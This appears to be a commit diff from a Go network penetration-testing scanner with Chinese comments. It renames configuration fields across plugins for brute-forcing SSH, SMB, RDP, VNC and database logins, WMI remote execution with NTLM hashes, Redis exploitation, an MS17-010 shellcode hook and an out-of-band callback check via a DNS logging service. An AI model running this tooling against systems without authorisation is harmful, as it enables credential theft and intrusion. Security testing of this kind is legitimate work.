if Common.SC != "" {
if Common.Shellcode != "" {
MS17010EXP(info)
}
}()

2
Plugins/MSSQL.go
View File

@ -11,7 +11,7 @@ import (
// MssqlScan 执行MSSQL服务扫描
func MssqlScan(info *Common.HostInfo) (tmperr error) {
if Common.IsBrute {
if Common.DisableBrute {
return
}

2
Plugins/Mongodb.go
View File

@ -9,7 +9,7 @@ import (
// MongodbScan 执行MongoDB未授权扫描
func MongodbScan(info *Common.HostInfo) error {
if Common.IsBrute {
if Common.DisableBrute {
return nil
}

2
Plugins/MySQL.go
View File

@ -11,7 +11,7 @@ import (
// MysqlScan 执行MySQL服务扫描
func MysqlScan(info *Common.HostInfo) (tmperr error) {
if Common.IsBrute {
if Common.DisableBrute {
return
}

2
Plugins/Oracle.go
View File

@ -11,7 +11,7 @@ import (
// OracleScan 执行Oracle服务扫描
func OracleScan(info *Common.HostInfo) (tmperr error) {
if Common.IsBrute {
if Common.DisableBrute {
return
}

2
Plugins/Postgres.go
View File

@ -11,7 +11,7 @@ import (
// PostgresScan 执行PostgreSQL服务扫描
func PostgresScan(info *Common.HostInfo) (tmperr error) {
if Common.IsBrute {
if Common.DisableBrute {
return
}

4
Plugins/RDP.go
View File

@ -30,7 +30,7 @@ type Brutelist struct {
// RdpScan 执行RDP服务扫描
func RdpScan(info *Common.HostInfo) (tmperr error) {
if Common.IsBrute {
if Common.DisableBrute {
return
}
@ -47,7 +47,7 @@ func RdpScan(info *Common.HostInfo) (tmperr error) {
port, _ := strconv.Atoi(info.Ports)
// 启动工作协程
for i := 0; i < Common.BruteThread; i++ {
for i := 0; i < Common.BruteThreads; i++ {
wg.Add(1)
go worker(info.Host, Common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, Common.Timeout)
}

4
Plugins/Redis.go
View File

@ -27,7 +27,7 @@ func RedisScan(info *Common.HostInfo) (tmperr error) {
return err
}
if Common.IsBrute {
if Common.DisableBrute {
return
}
@ -167,7 +167,7 @@ func RedisUnauth(info *Common.HostInfo) (flag bool, err error) {
// Expoilt 尝试Redis漏洞利用
func Expoilt(realhost string, conn net.Conn) error {
// 如果配置为不进行测试则直接返回
if Common.Noredistest {
if Common.DisableRedis {
return nil
}

2
Plugins/SMB.go
View File

@ -12,7 +12,7 @@ import (
// SmbScan 执行SMB服务的认证扫描
func SmbScan(info *Common.HostInfo) (tmperr error) {
// 如果未启用暴力破解则直接返回
if Common.IsBrute {
if Common.DisableBrute {
return nil
}

14
Plugins/SMB2.go
View File

@ -15,7 +15,7 @@ import (
func SmbScan2(info *Common.HostInfo) (tmperr error) {
// 如果未启用暴力破解则直接返回
if Common.IsBrute {
if Common.DisableBrute {
return nil
}
@ -51,7 +51,7 @@ func smbHashScan(info *Common.HostInfo, hasprint bool, startTime int64) error {
return err
}
if len(Common.Hash) > 0 {
if len(Common.HashValue) > 0 {
break
}
}
@ -80,7 +80,7 @@ func smbPasswordScan(info *Common.HostInfo, hasprint bool, startTime int64) erro
return err
}
if len(Common.Hash) > 0 {
if len(Common.HashValue) > 0 {
break
}
}
@ -101,7 +101,7 @@ func logSuccessfulAuth(info *Common.HostInfo, user, pass string, hash []byte) {
}
if len(hash) > 0 {
result += fmt.Sprintf("Hash:%v", Common.Hash)
result += fmt.Sprintf("HashValue:%v", Common.HashValue)
} else {
result += fmt.Sprintf("Pass:%v", pass)
}
@ -112,8 +112,8 @@ func logSuccessfulAuth(info *Common.HostInfo, user, pass string, hash []byte) {
func logFailedAuth(info *Common.HostInfo, user, pass string, hash []byte, err error) {
var errlog string
if len(hash) > 0 {
errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Hash:%v Err:%v",
info.Host, info.Ports, user, Common.Hash, err)
errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v HashValue:%v Err:%v",
info.Host, info.Ports, user, Common.HashValue, err)
} else {
errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Pass:%v Err:%v",
info.Host, info.Ports, user, pass, err)
@ -213,7 +213,7 @@ func logShareInfo(info *Common.HostInfo, user string, pass string, hash []byte,
// 添加认证信息
if len(hash) > 0 {
result += fmt.Sprintf("Hash:%v ", Common.Hash)
result += fmt.Sprintf("HashValue:%v ", Common.HashValue)
} else {
result += fmt.Sprintf("Pass:%v ", pass)
}

12
Plugins/SSH.go
View File

@ -12,7 +12,7 @@ import (
)
func SshScan(info *Common.HostInfo) (tmperr error) {
if Common.IsBrute {
if Common.DisableBrute {
return
}
@ -82,7 +82,7 @@ func SshScan(info *Common.HostInfo) (tmperr error) {
}
// 如果指定了SSH密钥则不进行密码尝试
if Common.SshKey != "" {
if Common.SshKeyPath != "" {
return err
}
}
@ -94,8 +94,8 @@ func SshScan(info *Common.HostInfo) (tmperr error) {
func SshConn(ctx context.Context, info *Common.HostInfo, user string, pass string) (flag bool, err error) {
// 准备认证方法
var auth []ssh.AuthMethod
if Common.SshKey != "" {
pemBytes, err := ioutil.ReadFile(Common.SshKey)
if Common.SshKeyPath != "" {
pemBytes, err := ioutil.ReadFile(Common.SshKeyPath)
if err != nil {
return false, fmt.Errorf("[-] 读取密钥失败: %v", err)
}
@ -203,7 +203,7 @@ func SshConn(ctx context.Context, info *Common.HostInfo, user string, pass strin
if result.err != nil {
return true, result.err
}
if Common.SshKey != "" {
if Common.SshKeyPath != "" {
Common.LogSuccess(fmt.Sprintf("[+] SSH密钥认证成功 %v:%v\n命令输出:\n%v",
info.Host, info.Ports, string(result.output)))
} else {
@ -212,7 +212,7 @@ func SshConn(ctx context.Context, info *Common.HostInfo, user string, pass strin
}
}
} else {
if Common.SshKey != "" {
if Common.SshKeyPath != "" {
Common.LogSuccess(fmt.Sprintf("[+] SSH密钥认证成功 %v:%v",
info.Host, info.Ports))
} else {

2
Plugins/SmbGhost.go
View File

@ -97,7 +97,7 @@ const (
// SmbGhost 检测SMB Ghost漏洞(CVE-2020-0796)的入口函数
func SmbGhost(info *Common.HostInfo) error {
// 如果开启了暴力破解模式,跳过该检测
if Common.IsBrute {
if Common.DisableBrute {
return nil
}

2
Plugins/VNC.go
View File

@ -11,7 +11,7 @@ import (
// VncScan 执行VNC服务扫描及密码尝试
func VncScan(info *Common.HostInfo) (tmperr error) {
// 如果已开启暴力破解则直接返回
if Common.IsBrute {
if Common.DisableBrute {
return
}

12
Plugins/WMIExec.go
View File

@ -34,7 +34,7 @@ func init() {
// WmiExec 执行WMI远程命令
func WmiExec(info *Common.HostInfo) (tmperr error) {
// 如果是暴力破解模式则跳过
if Common.IsBrute {
if Common.DisableBrute {
return nil
}
@ -49,7 +49,7 @@ func WmiExec(info *Common.HostInfo) (tmperr error) {
pass = strings.Replace(pass, "{user}", user, -1)
// 尝试WMI连接
flag, err := Wmiexec(info, user, pass, Common.Hash)
flag, err := Wmiexec(info, user, pass, Common.HashValue)
// 记录错误日志
errlog := fmt.Sprintf("[-] WmiExec %v:%v %v %v %v", info.Host, 445, user, pass, err)
@ -66,8 +66,8 @@ func WmiExec(info *Common.HostInfo) (tmperr error) {
}
// 添加认证信息到结果
if Common.Hash != "" {
result += "hash: " + Common.Hash
if Common.HashValue != "" {
result += "hash: " + Common.HashValue
} else {
result += pass
}
@ -85,8 +85,8 @@ func WmiExec(info *Common.HostInfo) (tmperr error) {
}
}
// 如果使用NTLM Hash,则跳过密码循环
if len(Common.Hash) == 32 {
// 如果使用NTLM HashValue,则跳过密码循环
if len(Common.HashValue) == 32 {
break PASS
}
}

4
Plugins/WebTitle.go
View File

@ -21,7 +21,7 @@ import (
// WebTitle 获取Web标题并执行扫描
func WebTitle(info *Common.HostInfo) error {
// 如果是webpoc扫描模式直接执行WebScan
if Common.Scantype == "webpoc" {
if Common.ScanMode == "webpoc" {
WebScan.WebScan(info)
return nil
}
@ -38,7 +38,7 @@ func WebTitle(info *Common.HostInfo) error {
}
// 根据配置决定是否执行漏洞扫描
if !Common.NoPoc && err == nil {
if !Common.DisablePoc && err == nil {
WebScan.WebScan(info)
} else {
errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)

2
WebScan/lib/Client.go
View File

@ -37,7 +37,7 @@ func Inithttp() {
}
// 初始化HTTP客户端
err := InitHttpClient(Common.PocNum, Common.Proxy, time.Duration(Common.WebTimeout)*time.Second)
err := InitHttpClient(Common.PocNum, Common.HttpProxy, time.Duration(Common.WebTimeout)*time.Second)
if err != nil {
panic(err)
}

10
WebScan/lib/Eval.go
View File

@ -57,7 +57,7 @@ func Evaluate(env *cel.Env, expression string, params map[string]interface{}) (r
return result, nil
}
// UrlTypeToString 将 URL 结构体转换为字符串
// UrlTypeToString 将 TargetURL 结构体转换为字符串
func UrlTypeToString(u *UrlType) string {
var builder strings.Builder
@ -604,7 +604,7 @@ func reverseCheck(r *Reverse, timeout int64) bool {
// 提取子域名
sub := strings.Split(r.Domain, ".")[0]
// 构造 API 请求 URL
// 构造 API 请求 TargetURL
apiURL := fmt.Sprintf("http://api.ceye.io/v1/records?token=%s&type=dns&filter=%s",
ceyeApi, sub)
@ -700,7 +700,7 @@ func DoRequest(req *http.Request, redirect bool) (*Response, error) {
return resp, err
}
// ParseUrl 解析 URL 并转换为自定义 URL 类型
// ParseUrl 解析 TargetURL 并转换为自定义 TargetURL 类型
func ParseUrl(u *url.URL) *UrlType {
return &UrlType{
Scheme: u.Scheme,
@ -782,10 +782,10 @@ func getRespBody(oResp *http.Response) ([]byte, error) {
defer reader.Close()
decompressed, err := io.ReadAll(reader)
if err != nil && err != io.EOF && len(decompressed) == 0{
if err != nil && err != io.EOF && len(decompressed) == 0 {
return nil, err
}
if len(decompressed) == 0 && len(body) != 0{
if len(decompressed) == 0 && len(body) != 0 {
return body, nil
}
return decompressed, nil